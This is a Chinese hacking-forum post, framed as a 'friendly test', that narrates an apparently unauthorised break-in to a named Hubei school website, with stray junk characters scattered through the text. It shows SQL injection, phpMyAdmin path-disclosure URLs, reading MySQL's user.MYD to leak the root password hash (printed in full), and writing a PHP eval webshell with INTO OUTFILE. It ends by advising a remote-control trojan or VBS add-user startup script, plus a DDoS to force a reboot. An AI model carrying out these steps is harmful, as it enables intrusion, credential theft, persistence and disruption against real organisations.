友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
* z6 T5 Z( L* ?3 \: {" h9 m, w: b
$ b: O% `: o+ ^1 h4 c
) r4 t8 M( g2 x
常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

+ }5 f' j. j8 b那么想可以直接写入shell ，getshell有几个条件：
- r* v, U7 P& u

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
0 d1 N( @6 W" F# K. N+ K6 L
1 ~3 R8 H" K, Q. X: @2 Z/ x试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
2./phpMyAdmin/phpinfo.php  
! s  ^) M, B2 b& Q3./load_file()  
& L" O& l& n! F* P' m7 w4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
: Z2 b6 x# O3 q8 |+ R5./phpmyadmin/libraries/select_lang.lib.php  
( |0 U" [- K  ~: _  d4 b( F6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  
* F; s8 m5 D- z7 c* J2 @% T
: p7 e, m4 s* R9 F( g均不行...........................

御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

/ x* R# r0 V  H2 C. H敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
3 {, `4 B& A) z9 l
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
* G2 E$ G+ w- t$ I
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
- p% t, H* l9 U- K4 T: F+ |3 L
3 M1 i' g/ T( {) P+ _自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：
9 {$ c; t5 R# c8 ]8 ^
2 _% L  I3 a; O4 ^, E/ ^: W2 ?17---- r(0072)
18---- o(006f)
19---- o(006f)
20---- t(0074)
6 w# w8 T4 Z- |) l' p+ P( t6 d' p0 k21---- *(002a)
8 `3 q) ~. w; c/ \0 g22---- 8(0038)
: L, l4 F/ w( K23---- 2(0032)
24---- E(0045)
% I5 a; d9 S9 \4 o: _* }6 ?0 f25---- 1(0031)
26---- C(0043)
27---- 5(0035)
  y) l% s% ], i! c28---- 8(0038)
29---- 2(0032)
30---- 8(0038)
. H5 E0 z) K8 `31---- A(0041)
32---- 9(0039)
33---- B(0042)
34---- 5(0035)
4 k/ h4 ^' G( n, z9 f7 j9 v35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
2 ^3 q+ d! |" I  W' I% Y/ V39---- 9(0039)
0 q) w6 h2 H. G& J- u40---- 1(0031)
41---- 1(0031)
  m% {8 d# r$ n& r; v42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
% v3 ?8 z+ ~0 F45---- 9(0039)
+ J: k% Y% N0 ^46---- 8(0038)
47---- F(0046)
48---- F(0046)
, r: l5 B  U$ Y5 @6 @# `4 o& X' N49---- 4(0034)
50---- F(0046)
! [: X- z( E+ Y& k2 _51---- 0(0030)
# i) \( ~1 D3 s3 Q4 J7 T52---- 3(0033)
53---- 2(0032)
: k# K# F2 `- G4 S5 Z54---- A(0041)
55---- 4(0034)
56---- A(0041)
! R+ h$ e8 F2 a$ Y57---- B(0042)
0 l: H0 o$ l7 }% R58---- *(0044)
8 s# P# u* v1 l. ]. A59---- *(0035)
60---- *(0041)
# t+ C# A# }/ L  e61---- *0032)

解密后成功登陆phpmyamin
                          
- g" F2 \6 w+ n0 ?& h7 U% Z
                             

找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
! o, i3 d0 Z1 E- y6 X: U# q
成功执行，拿下shell，菜刀连接：

服务器不支持asp,aspx,php提权无果...................

, d# ]  G4 D7 v但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
9 y7 {" Z. K, ^  e7 _8 d: |

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

: {8 d! O. j# K

-------------------------------------------------------------------------------
admin
Administrator
slipper$
sqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

" w, J1 }- r7 ^9 lddos服务器重启，不然就只能坐等服务器重启了...............................

      

; y4 ~+ }! h3 V

angel